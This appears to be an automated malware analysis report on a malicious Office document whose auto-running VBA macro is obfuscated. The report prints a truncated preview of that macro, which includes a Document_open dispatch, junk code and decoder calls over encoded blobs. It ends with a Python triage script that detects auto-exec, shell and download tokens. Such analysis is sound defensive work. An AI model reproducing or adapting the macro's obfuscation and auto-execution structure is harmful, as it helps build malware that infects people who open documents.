Verdict: MALICIOUS
Risk score: 224

Malware Insights

MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1204.002 User Execution: Malicious File
- T1566.001 Phishing: Spearphishing Attachment
The sample is a Microsoft Office document carrying a VBA macro that runs automatically when the document is opened (a Document_Open handler) and reaches a Shell() call. The OLE_VBA_SHELL and OLE_VBA_PCODE_AUTOEXEC_EXEC heuristics, which match shell, download and object-execution tokens next to the auto-exec entry point, indicate that the macro is built to fetch and run a secondary payload, and ClamAV flags the document as Doc.Malware.Emodldr-10025032-0. Because the source was recovered successfully here, the p-code heuristic corroborates the decoded macro rather than standing in for it. The 'macros.bas' artifact is that VBA source as decoded by olevba; its preview shows a heavily obfuscated module: junk arithmetic on undefined variables under On Error Resume Next, a Document_open handler that dispatches through Application.Run to a macro whose name is assembled from string fragments at run time, and repeated calls to a decoder routine (mTqsd) over long base64-like literals with offset and length arguments.
Heuristics (7)

| Heuristic | Severity | Signature | Details |
|---|---|---|---|
| ClamAV: Doc.Malware.Emodldr-10025032-0 | critical | CLAMAV_DETECTION | ClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0 |
| VBA macros detected | medium | OLE_VBA_MACROS | Document contains VBA macro code (3 related findings) |
| Shell() call in VBA | critical | OLE_VBA_SHELL | Shell() call in VBA |
| Document_Open macro | high | OLE_VBA_DOCOPEN | Document_Open macro |
| VBA p-code auto-exec with execution tokens | high | OLE_VBA_PCODE_AUTOEXEC_EXEC | Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable. |
| Suspicious extracted artifact | info | EXTRACTED_FILE_STATIC_TRIAGE | One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms. |
| Embedded URL | info | EMBEDDED_URL | One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. |

Embedded URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body). This is the standard DrawingML XML namespace URI found in ordinary Office files, not an address the macro contacts, so it should not be treated as a network indicator.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 46032 bytes |

SHA-256: 91f1f475e714a6c0503045463d968bcb542e2fa332ecf5fb18f59109b184eb63

Detection (macros.bas)
- ClamAV: No threats found (this verdict is for the extracted VBA source only; the ClamAV hit above is on the parent document)
- Obfuscation or payload: likely. Carved artifact contains 16 long base64-like blob(s).
Preview script (first 1,000 lines of the extracted script)
Attribute VB_Name = "uspoDbhj"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
zZRAC _
= ChrB(39698 / Log(36398) / 57920 _
+ 28758)
EnMUJk = 39665 _
/ CBool(NFcMtG) / 74 + CSng(ldXYsO) - _
(rVAHr * pVVZMz)
Application.Run WWDwJc + "QuvdlkcsOKTjCm" + hWamj, YRqvF + OqWohrdajYjP + VhvrT
sassj _
= ChrB(6375 / Log(1053) / 92101 _
+ 52957)
OabOP = 85800 _
/ CBool(VuNbjV) / 74 + CSng(iaTqb) - _
(aijuRC * omXmkj)
End Sub
Attribute VB_Name = "DPUrGcsaw"
Sub aLEUN(jKUif)
rjzNOA _
= ChrB(67091 / Log(44416) / 53039 _
+ 82771)
DUOGcj = 98105 _
/ CBool(zhdTF) / 74 + CSng(IbdnbQ) - _
(mSYnu * NsrZij)
End Sub
Function OqWohrdajYjP()
On Error Resume Next
LADdh _
= ChrB(91932 / Log(7693) / 25947 _
+ 35639)
HmIQN = 44575 _
/ CBool(PDzKLn) / 74 + CSng(fifnjA) - _
(XKUVE * vQZztl)
GwzibwsLTj = mTqsd("lREiIANwA3ADkAMgBmADYANgA5AGUAZAA4AGUAYwBiAGIAMwBmAGIAMQA4AGIAMQBlADMAYQA1AGMAMwA5ADQAOQAzAGQAMQA5ADUAYwA5ADAAYgAxADLk", OEZHEZ - OEZHEZ + 5 + OEZHEZ - OEZHEZ, OEZHEZ - OEZHEZ + 112 + OEZHEZ - OEZHEZ)
AdMdw _
= ChrB(38378 / Log(11798) / 21634 _
+ 60205)
IzNWzD = 31497 _
/ CBool(jRmjb) / 74 + CSng(uJtAwi) - _
(RanjCR * pMuNs)
SAbvsw _
= ChrB(49580 / Log(64673) / 66136 _
+ 46960)
EIcBW = 1481 _
/ CBool(bFMLl) / 74 + CSng(NzHizm) - _
(MYhdQp * jwjKN)
DVmhdwPBP = mTqsd("a ahQGEANgA4ADgAMgA4ADUAZgAzADgAOABiADgAMwA3AGUAYwBlAGEAMABlAGUAOn2sf", LVrGz - LVrGz + 6 + LVrGz - LVrGz, LVrGz - LVrGz + 60 + LVrGz - LVrGz)
ZhniU _
= ChrB(30857 / Log(3016) / 33415 _
+ 7279)
aHPlhv = 77466 _
/ CBool(hvwofb) / 74 + CSng(lhuZdW) - _
(zVQfJ * JjlII)
YLwjYz _
= ChrB(9853 / Log(77350) / 31496 _
+ 56163)
wjYjtY = 54396 _
/ CBool(OHjczr) / 74 + CSng(aGfjS) - _
(wPWqha * HJCqU)
CnaHCSPCSd = mTqsd("fbLT9jA4AGIAYgA3AGEANgA1ADcAYQBiADEAMwAwAGEAOAAxADQAZgBhAGYAOAAzAGEAMgA4ADkAMQA2ADMANQA4AGQAYgA3ADMAOAA0AGQAOAAzAGUAZABhAGEAMwBlADMAZgAysk", GWADYo - GWADYo + 7 + GWADYo - GWADYo, GWADYo - GWADYo + 130 + GWADYo - GWADYo)
nWjuH _
= ChrB(8903 / Log(24322) / 27719 _
+ 19202)
pjzoMX = 97703 _
/ CBool(hKBzT) / 74 + CSng(qLzYT) - _
(FtHoD * qLYiGf)
fmlcX _
= ChrB(70205 / Log(8795) / 13886 _
+ 21177)
hVCir = 89883 _
/ CBool(SwnKcJ) / 74 + CSng(WwYAr) - _
(kirBbT * zvcPK)
rumOWHllRn = mTqsd("UEzAGIAMAAwAGUAOABhAGEANABjADkAMQAxADMAZABhADcAMAA4AGQAMAAyADEANwA4ADQAZgBhADcANgA4ADcAZQBmAGYAMQAyADkAZAA3ADIAMwA3ADUAMwA2ADEAOQAxAGIANQA1ADcAYQBmADMAZQAwAGIAMwBwR", kjGilr - kjGilr + 4 + kjGilr - kjGilr, kjGilr - kjGilr + 158 + kjGilr - kjGilr)
wdqKhn _
= ChrB(69323 / Log(63238) / 33624 _
+ 53388)
zCdMFZ = 23105 _
/ CBool(PibDd) / 74 + CSng(CYuoX) - _
(XAtMv * nqMHzS)
zHHJu _
= ChrB(80047 / Log(48136) / 67961 _
+ 10492)
pNJib = 33509 _
/ CBool(rRPit) / 74 + CSng(SKPiJf) - _
(TPvAaM * kZwAiV)
paktdOspB = mTqsd("ZHLUNIANgBjADQAMABhADgAYQA1ADAAMwBjADcAOQAwADgAYgBlADkAMABiAGIAYwA2ADIANwBkAGIAZgA5ADAAYwA2ADEAZAA4ADMARK", wEZpo - wEZpo + 6 + wEZpo - wEZpo, wEZpo - wEZpo + 98 + wEZpo - wEZpo)
WnYBWb _
= ChrB(89305 / Log(35653) / 51885 _
+ 10361)
DWoziH = 30781 _
/ CBool(OiaSI) / 74 + CSng(OoYRT) - _
(zYEvW * hmEwAo)
tbKlz _
= ChrB(64739 / Log(81665) / 65966 _
+ 11494)
suBFiO = 24758 _
/ CBool(wcqpH) / 74 + CSng(ivfsV) - _
(opiLC * ziHtzh)
djqNVsinzFC = mTqsd("9azAA0AGIAMABiADcAZgA1ADQAOQAwADEAYQA4ADcAYgBiAGEAMgAYuh", FWpnlv - FWpnlv + 4 + FWpnlv - FWpnlv, FWpnlv - FWpnlv + 50 + FWpnlv - FWpnlv)
RTLif _
= ChrB(7285 / Log(31422) / 34951 _
+ 74340)
lVDUu = 6058 _
/ CBool(BwNEn) / 74 + CSng(PpDwQ) - _
(REcImp * WNzoEj)
jZdTQ _
= ChrB(9819 / Log(42885) / 58206 _
+ 52314)
VEllY = 43563 _
/ CBool(INAWl) / 74 + CSng(JRCBcA) - _
(UYYtE * EPopq)
tAzIQipf = mTqsd("%m2,224,14,192,203,248,224,226,7,153,14NnjhSJ", StpzM - StpzM + 3 + StpzM - StpzM, StpzM - StpzM + 37 + StpzM - StpzM)
PIHps _
= ChrB(76291 / Log(38937) / 1378 _
+ 33566)
OIjvzU = 3719 _
/ C
... (truncated)
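The checks behind the OLE_VBA_DOCOPEN, OLE_VBA_SHELL and EXTRACTED_FILE_STATIC_TRIAGE findings above (auto-exec entry point, execution or download token, long base64-like literals) can be reproduced over the VBA text that olevba extracts. The script below is an added example written for this page, not the analyzer's own code: it splits olevba's concatenated output into modules on the Attribute VB_Name lines, runs each check with absolute line numbers, and combines them the way the report's severities suggest. The token lists in the regexes are assumptions, and the input is a constructed excerpt of the macros.bas preview (the Document_open handler and one mTqsd call), not the full 46 KB module.

```python
"""Static triage of olevba-extracted VBA source (added example, not analyzer code)."""
import re
from dataclasses import dataclass
from typing import Dict, Iterator, List, Tuple

# Constructed input: an excerpt of the macros.bas preview shown in this report
# (the Document_open handler and one decoder call). The rest of the 46 KB
# module is not reproduced here.
SAMPLE_VBA = '''Attribute VB_Name = "uspoDbhj"
Attribute VB_Base = "1Normal.ThisDocument"
Private Sub Document_open()
On Error Resume Next
Application.Run WWDwJc + "QuvdlkcsOKTjCm" + hWamj, YRqvF + OqWohrdajYjP + VhvrT
End Sub
Attribute VB_Name = "DPUrGcsaw"
Function OqWohrdajYjP()
On Error Resume Next
GwzibwsLTj = mTqsd("lREiIANwA3ADkAMgBmADYANgA5AGUAZAA4AGUAYwBiAGIAMwBmAGIAMQA4AGIAMQBlADMAYQA1AGMAMwA5ADQAOQAzAGQAMQA5ADUAYwA5ADAAYgAxADLk", 5, 112)
End Function
'''

# olevba writes one "Attribute VB_Name" line at the start of each module.
MODULE_RE = re.compile(r'^Attribute VB_Name = "([^"]+)"[ \t]*$', re.MULTILINE)
# Entry points Office runs without a click (assumed list; extend as needed).
AUTOEXEC_RE = re.compile(
    r'^[ \t]*(?:Private\s+|Public\s+)?(?:Sub|Function)\s+'
    r'(AutoOpen|Auto_Open|AutoExec|AutoClose|Auto_Close|Document_Open|'
    r'Document_Close|Workbook_Open|Workbook_Close)\b',
    re.IGNORECASE | re.MULTILINE)
# Execution tokens: a direct Shell, or indirection that hides the real target.
EXEC_RE = re.compile(
    r'\b(Shell|WScript\.Shell|Application\.Run|CallByName|ShellExecute|CreateObject)\b',
    re.IGNORECASE)
# Download tokens commonly used by macro downloaders (assumed list).
DOWNLOAD_RE = re.compile(
    r'\b(URLDownloadToFile|XMLHTTP|WinHttpRequest|ADODB\.Stream|'
    r'InternetExplorer\.Application)\b',
    re.IGNORECASE)
# A quoted literal of 40+ base64-alphabet characters. In this sample the
# literals go through a custom routine with offset/length arguments, so the
# whole literal is not expected to decode as plain base64; we only count them.
BLOB_RE = re.compile(r'"([A-Za-z0-9+/]{40,}={0,2})"')


@dataclass
class Finding:
    module: str
    category: str  # autoexec | exec | download | blob
    evidence: str
    line: int      # 1-based line in the extracted file


def split_modules(vba_text: str) -> Iterator[Tuple[str, int, str]]:
    """Yield (module name, body start offset, body) for each VB_Name block."""
    hits = list(MODULE_RE.finditer(vba_text))
    for i, m in enumerate(hits):
        end = hits[i + 1].start() if i + 1 < len(hits) else len(vba_text)
        yield m.group(1), m.end(), vba_text[m.end():end]


def triage(vba_text: str) -> Dict[str, object]:
    """Run the static checks and derive a verdict: an auto-exec entry point
    together with an exec/download token is the critical combination."""
    findings: List[Finding] = []
    checks = (("autoexec", AUTOEXEC_RE), ("exec", EXEC_RE),
              ("download", DOWNLOAD_RE), ("blob", BLOB_RE))
    for name, start, body in split_modules(vba_text):
        for category, regex in checks:
            for m in regex.finditer(body):
                evidence = m.group(1)
                if category == "blob":
                    evidence = f"{len(evidence)}-char base64-like literal"
                line = vba_text.count("\n", 0, start + m.start()) + 1
                findings.append(Finding(name, category, evidence, line))
    cats = {f.category for f in findings}
    if "autoexec" in cats and cats & {"exec", "download"}:
        verdict = "critical"
    elif cats & {"exec", "download"}:
        verdict = "high"
    elif cats:
        verdict = "medium"
    else:
        verdict = "info"
    return {
        "verdict": verdict,
        "findings": findings,
        "blob_count": sum(1 for f in findings if f.category == "blob"),
    }


if __name__ == "__main__":
    result = triage(SAMPLE_VBA)
    print("verdict:", result["verdict"])
    for f in result["findings"]:
        print(f"  {f.category:9} {f.module}:{f.line}  {f.evidence}")
```

On the excerpt this reports the Document_open entry point and the Application.Run dispatch in module uspoDbhj, one long literal in module DPUrGcsaw, and a critical verdict; the Shell() call and the remaining 15 blobs the analyzer counted sit in the part of macros.bas not reproduced here, so on the full file the exec list would be longer. Absolute line numbers are kept because they are what you hand to whoever de-obfuscates the decoder routine next.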